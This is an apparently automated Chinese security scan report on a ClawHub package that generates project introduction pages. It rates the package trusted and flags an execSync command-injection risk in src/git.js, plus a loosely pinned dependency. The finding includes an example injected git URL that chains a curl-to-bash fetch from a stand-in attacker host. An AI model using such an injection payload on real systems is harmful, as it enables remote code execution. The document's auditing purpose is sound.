中文 EN

扫描报告

扫描新文件

可信 — 风险评分 10/100
上次扫描:5 小时前 重新扫描
10 /100
project-intro-generator
一键生成项目介绍页,支持本地编辑和长图导出。
项目介绍页生成器,功能代码与声明一致,无恶意行为,仅发现 execSync 字符串拼接需注意输入来源。
技能名称project-intro-generator
分析耗时40.0s
引擎pi
ClawHub 项目宣传页和长截图一键生成工具 v0.1.3 by kunyashaw
📥 203
ClawHub 判定 可疑 dangerous_execllm_suspiciousvt_suspicious
可以安装
可安全使用。建议对 git clone 的 URL 参数做输入校验,防止通过特殊构造的 git URL 注入命令。

安全发现 2 项

严重性 安全发现 位置
中危
git clone 命令存在潜在注入风险 代码执行
src/git.js 第18行使用 execSync 直接拼接 gitUrl 参数构造 git clone 命令。如果攻击者能控制传入的 gitUrl(例如通过 --git 参数注入恶意命令),可能导致命令注入。例如传入 'https://evil.com && curl http://attacker.com/shell.sh|bash' 可能触发远程代码执行。
execSync(`git clone --depth 1 ${gitUrl} ${tempDir}`, { stdio: 'inherit' })
→ 使用 child_process.spawn 或 git 命令的 --git-dir 等安全参数,或对 gitUrl 进行 URL 格式校验(如正则匹配 /^https?:\/\// 且不含 shell 特殊字符)
 src/git.js:18
低危
marked 依赖无锁定版本 供应链
package.json 中 marked 使用 ^11.2.0 语义化版本,允许接受次版本和补丁更新,可能引入向后不兼容的变更。
"marked": "^11.2.0"
→ 考虑锁定精确版本 "marked": "11.2.0" 以提升可复现性
 package.json:23
资源类型声明权限推断权限状态证据
文件系统 READ READ ✓ 一致 src/analyzer.js:scanProject 扫描项目目录
文件系统 WRITE WRITE ✓ 一致 src/index.js:writeFile 生成 HTML 输出
网络访问 READ READ ✓ 一致 src/github.js:fetchGitHubRepoInfo 调用 GitHub API
命令执行 NONE WRITE ✓ 一致 src/git.js:18 execSync 拼接 gitUrl 执行 git clone
7 项发现
🔗
中危 外部 URL 外部 URL
https://clawhub.ai/kunyashaw/project-intro-generator
README.md:5
🔗
中危 外部 URL 外部 URL
https://www.youtube.com/watch?v=6ZRcgbdZSXw
README.md:10
🔗
中危 外部 URL 外部 URL
https://img.youtube.com/vi/6ZRcgbdZSXw/maxresdefault.jpg
README.md:11
🔗
中危 外部 URL 外部 URL
https://mirrors.huaweicloud.com/repository/npm/fsevents/-/fsevents-2.3.2.tgz
package-lock.json:9
🔗
中危 外部 URL 外部 URL
https://mirrors.huaweicloud.com/repository/npm/marked/-/marked-11.2.0.tgz
package-lock.json:15
🔗
中危 外部 URL 外部 URL
https://mirrors.huaweicloud.com/repository/npm/playwright/-/playwright-1.58.2.tgz
package-lock.json:20
🔗
中危 外部 URL 外部 URL
https://mirrors.huaweicloud.com/repository/npm/playwright-core/-/playwright-core-1.58.2.tgz
package-lock.json:30

目录结构

16 文件 · 100.6 KB · 2819 行
JavaScript 10f · 1991L Markdown 3f · 734L JSON 3f · 94L
├─ 📁 bin
│ └─ 📜 cli.js JavaScript 95L · 3.1 KB
├─ 📁 public
│ └─ 📜 html2canvas.min.js JavaScript 7L · 237 B
├─ 📁 src
│ ├─ 📜 analyzer.js JavaScript 700L · 22.7 KB
│ ├─ 📜 git.js JavaScript 33L · 809 B
│ ├─ 📜 github.js JavaScript 112L · 3.8 KB
│ ├─ 📜 image.js JavaScript 28L · 943 B
│ ├─ 📜 index.js JavaScript 59L · 2.0 KB
│ ├─ 📜 template.js JavaScript 801L · 35.9 KB
│ ├─ 📜 themes.js JavaScript 69L · 1.8 KB
│ └─ 📜 utils.js JavaScript 87L · 2.0 KB
├─ 📋 package-lock.json JSON 35L · 1.3 KB
├─ 📋 package.json JSON 36L · 697 B
├─ 📝 README.md Markdown 93L · 3.2 KB
├─ 📝 rules.md Markdown 558L · 18.8 KB
├─ 📋 skill.json JSON 23L · 605 B
└─ 📝 SKILL.md Markdown 83L · 2.7 KB

依赖分析 2 项

包名版本来源已知漏洞备注
marked ^11.2.0 npm 语义化版本宽松,建议锁定
playwright ^1.58.2 npm 可选依赖,用于截图,合理用途

安全亮点

✓ 功能与 SKILL.md 声明一致,无阴影功能
✓ HTML 生成基于模板,无 eval/动态代码执行
✓ 不访问 ~/.ssh、.env 等敏感路径
✓ 不收割环境变量中的 API 密钥或凭证
✓ 不外传任何数据到外部服务器
✓ playwright 依赖合理(截图功能)且为可选依赖